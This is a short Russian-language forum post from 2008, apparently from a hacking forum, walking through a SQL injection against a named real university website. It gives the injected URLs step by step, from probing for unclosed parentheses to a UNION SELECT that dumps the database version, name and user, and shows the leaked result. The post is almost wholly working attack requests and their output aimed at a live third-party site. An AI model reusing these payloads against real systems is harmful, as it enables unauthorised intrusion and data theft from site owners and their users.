19.03.2008, 16:45
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
|
|
ды нет, просто нужно всегда проверять на наличие открытых скобок вот так:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+and+(1=1
нет ошибки, значит как минимум 1 скобка открыта. теперь так:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1))+and+((1=1
ЭРРОР, значит 1 скобка открыта и её нужно закрыть.
А птоом подбираем:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11/*
потом по стандарту:
http://www.ksu.ru/usvr/index.php?id=17&idm=-1)+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11/*
и видим:
5.0.26:uniksu:uniksu@localhost
|
|
|